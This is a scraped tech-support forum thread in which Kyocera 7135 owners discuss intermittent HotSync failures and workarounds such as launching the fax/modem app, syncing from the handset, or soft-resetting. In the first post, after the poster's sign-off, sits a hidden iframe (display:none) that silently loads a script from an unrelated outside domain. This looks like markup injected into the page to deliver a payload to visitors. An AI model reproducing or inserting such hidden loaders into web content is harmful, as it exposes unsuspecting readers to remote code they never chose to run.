+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 23
  1. #1
    Billy Bo Bob Brain BrerLapn's Avatar
    Join Date
    01-06-2003
    Location
    Arlington, VA
    Posts
    494

    Hot Sync Sporadic Problem

    I did a search for this, but the only place it seemed to come up was for the 6035. I am (trying to) use the USB connector to hotsync my phone. It works sometimes, but sometimes when I try to hotsync it times out and I get no response from the PC. At first, I had the cradle plugged into a hub, and I remembered something about giving it its own USB port, but I'm still having the periodic issues even with its own port. I have the hotsync settings for local USB, and I tried making a custom hotsync setting that would use the USB, but so far I'm still getting only sporadic hotsyncs. Any suggestions? (When it does hotsync, there aren't any failures or anything). Thanks,

    Brer:dunno<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ---------------
    The same thing we do every night, Pinky...

  2. #2
    Registered User
    Join Date
    07-14-2002
    Posts
    330

    Re: Hot Sync Sporadic Problem

    Originally posted by BrerLapn
    I did a search for this, but the only place it seemed to come up was for the 6035. I am (trying to) use the USB connector to hotsync my phone. It works sometimes, but sometimes when I try to hotsync it times out and I get no response from the PC. At first, I had the cradle plugged into a hub, and I remembered something about giving it its own USB port, but I'm still having the periodic issues even with its own port. I have the hotsync settings for local USB, and I tried making a custom hotsync setting that would use the USB, but so far I'm still getting only sporadic hotsyncs. Any suggestions? (When it does hotsync, there aren't any failures or anything). Thanks,

    Brer:dunno
    I've had this same problem. I haven't fixed it, only found a workaround. When I put the phone into the cradle, I start a fax/modem session, then push the hotsync button. Only then will my pc start a hotsync.

  3. #3
    rescue! lurkingforinfo's Avatar
    Join Date
    08-24-2003
    Posts
    292

    Me too

    I'm having this problem way too frequently. You guys still experiencing this?

    Anybody else care to speculate on this? It's a PITA!! I spent at least half an hour today before I got the hotsync to work--and really didn't do anything different!

    Beth

  4. #4
    PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar
    Join Date
    09-29-2003
    Location
    ST. ALBANS, WV
    Posts
    891

    HOTSYNC

    What settings do you have on your hotsync software.

    I have mine running on a hub without every having and error.

    I have mine set to usb local and also network. I use usb without error when in office and when on the road i can use network to sync.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

  5. #5
    Registered User
    Join Date
    07-14-2002
    Posts
    330

    Re: Me too

    Originally posted by lurkingforinfo
    I'm having this problem way too frequently. You guys still experiencing this?

    Anybody else care to speculate on this? It's a PITA!! I spent at least half an hour today before I got the hotsync to work--and really didn't do anything different!

    Beth
    I'm still having to use the workaround I described above. It is a PITA, but a small price to pay for use of the great 7135.

  6. #6
    Registered User
    Join Date
    02-27-2003
    Location
    Garnerville, NY
    Posts
    73
    I Hot Sychd this morning and all was well. When I tried to synch this afternoon I get a message on my 7135 that says "this feature is not available when the port is in use" I've called Kyocera, Palm and Gateway with no fix. Any ideas?????

  7. #7
    Registered User
    Join Date
    04-11-2003
    Posts
    4
    I am having this same "this feature is not available when the port is in use" problem.

    I can go into the palm and select the hotsync "program" and then it works fine ... this is a workaround but I am confused.

    Did anyone ever find a solution?

  8. #8
    Registered User
    Join Date
    12-29-2002
    Posts
    4
    After some time with Kyocera this is a "bug," they don't quite know how to fix yet. Other than to say it is not happening with a USB connection. I was using my serial connecting thinking it would be more stable, but apparently not.

    The work around for now is to sync directly from the palm and not use the cradle button. The Kyocera rep did say she would research it further and email me if she found anything out. <shrug> If she does I'll post here.

    Having too much fun with the 7135.

    Terri

    message quote: from other forum:

    This feature is not available when the port is in use
    Thanks for the work-around, Alti, because I've been battling this all day. I even unistalled, reinstalled, but didn't think to try a HS from the palm itself. Well, I wasn't going to go through this hassle each time I want to HS and was getting quite frustrated. I'm using a direct com port connection and it works just fine sometimes and then other times I get the error message of "This feature is not available when the port is in use."

    I did learn do NOT bother calling Palm, as they're not supporting the Smartphone without a $25.00 charge. Oh, thanks! So, now I've been on hold with Kyocera for 15 mins. If I find the fix I'll post it here.


    __________________
    Terri Romine
    www.innovativeoffice.net
    Terri Romine
    www.innovativeoffice.net

  9. #9
    Registered User
    Join Date
    11-30-2002
    Posts
    180
    I was going to make some suggestions...then realized too many.

    I recommend that one of you having problems should list all of your settings, so that everyone can get on the same page. Equipment used would be helpful, too.

    May all your sync problems go away and never return...wish for the day.

  10. #10
    Registered User
    Join Date
    01-09-2004
    Posts
    1

    Found Fix!

    I found a reference here:

    http://www.risingroad.com/symptoms/symptom0174.html

    I went to my network page, but I did not have a connection. So I connected to VZW Quick 2 Net (14.4 kbps), and then I disconnected it.

    That fixed the problem. I can now hotsync from the cradle again.

  11. #11
    Never Forget 9/11/01 kerryclair's Avatar
    Join Date
    12-28-2003
    Posts
    119
    >>I am having this same "this feature is not available when the port is in use" problem.<<

    Me too!!
    3 of every 4 attempts to hotsynch using the button gave me this same error. It was making me crazy. I found the same solution you did:

    >>can go to the palm and select the hotsync "program" and then it works fine<<

    I click on Hotsync from the palm itself and then click on the hotsync icon and it goes fine every time.

    It took me a while to realize that the hotsync logo was clickable!!!

  12. #12
    Registered User
    Join Date
    01-23-2004
    Posts
    1

    Smile Hotsync cradle button problem solved

    Anyone with a Kyocera 7135 who is having trouble using the cradle hotsync button: I just had a 1-min. conversation with Kyocera support and fixed the problem (apparently). All you have to do is open the Fax Modem application that comes on the phone, wait for it to say "ready to send", then just hit your Home key (exit the Fax Modem application without doing anything further), back to main menu. Do this first with the phone off the cradle, then with the phone on the cradle. What this does is it clears the port and enables you to use hotsync via the cradle button. I am using the serial connection. I just turned the phone off & on, and exited and restarted Hotsync Mgr. to check, and it works fine.

  13. #13
    Cornfused MGuzzy's Avatar
    Join Date
    08-27-2003
    Location
    Sacramento, CA
    Posts
    2,810
    Good post Kycerauser999, you might post that one in a FAQ thread as well. BTW welcome to the forum.
    mg
    Luck is where opportunity meets preparation.

  14. #14
    Registered User
    Join Date
    11-24-2003
    Posts
    16

    a fix! thank you

    this has been driving me nuts. it correlated to my move from W98 > XP recently, and i thought it was that.

    thanks so much for posting this,

  15. #15
    Registered User
    Join Date
    10-31-2003
    Posts
    175

    Re: Hotsync cradle button problem solved

    Originally posted by kycerauser999
    Anyone with a Kyocera 7135 who is having trouble using the cradle hotsync button: I just had a 1-min. conversation with Kyocera support and fixed the problem (apparently). All you have to do is open the Fax Modem application that comes on the phone, wait for it to say "ready to send", then just hit your Home key (exit the Fax Modem application without doing anything further), back to main menu. Do this first with the phone off the cradle, then with the phone on the cradle. What this does is it clears the port and enables you to use hotsync via the cradle button. I am using the serial connection. I just turned the phone off & on, and exited and restarted Hotsync Mgr. to check, and it works fine.
    The other fix they gave me once was to go to the phone, press 111111 (1 - 6 times), scroll down and select options. Then choose "service interface" and then click on "reset". This will soft reset the 7135, but when I did it the button on the cradle worked again.

  16. #16
    Registered User
    Join Date
    01-03-2004
    Location
    Dever & Winter Park, Co.
    Posts
    6
    I too have had intermittent non-hotsyncs. During attempts I have had messages (on my Mac G4 running OS 10.3.2) saying: "Conduit Manager" "File is locked". After a soft reset on the 7135 & a restart on the G3 all is syncing but prior to that I had typed contacts & date book entrys on the desktop that didn't even show up again! On the older Kyocera 63**? model I had to turn off the "Beam" to sync. I don't think it has an on-off on the 7135.

  17. #17
    Registered User
    Join Date
    12-31-2003
    Location
    Dallas
    Posts
    11
    Just for clarification - this happens with USB, in addition to the Serial port. Again, just launch the HotSync from your Palm menu (zLauncher for me), and it works fine. Still haven't figured out the condition that causes it on this end.....

  18. #18
    Registered User
    Join Date
    02-16-2004
    Posts
    9

    Thumbs up hot sync problem

    Thanks for the fix! I have lurked here for a few weeks and learned much from so many. When the hot sync problem happened to me and I found the answer so quickly, I was moved to post my gratitude!

  19. #19
    Registered User
    Join Date
    01-03-2004
    Location
    Dever & Winter Park, Co.
    Posts
    6
    I have had more hot sync problems with the message: "CONDUIT MANAGER"-"Volume is locked" when connected to the Palm Desktop. Some items do sync. My computer Doc says I need to re-install Palm 4.1 so I'm trying to get a download (& permission from Palm) to do it for a re-install on the deskstop after removing the old. Does anyone else have messages from the CONDUIT MANAGER or Desktop saying "FILE (or) VOLUME IS LOCKED"???

  20. #20
    dancing geeky chick nsanders's Avatar
    Join Date
    03-26-2002
    Location
    Northern AZ
    Posts
    454
    My boss has had this problem from the beginning: sporadic recognition for hotsync. The error that he gets is "USB device not recognized."

    None of the above fixes are work for him. The only fix we have found is to restart the computer.

    Any ideas?
    Nicky

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts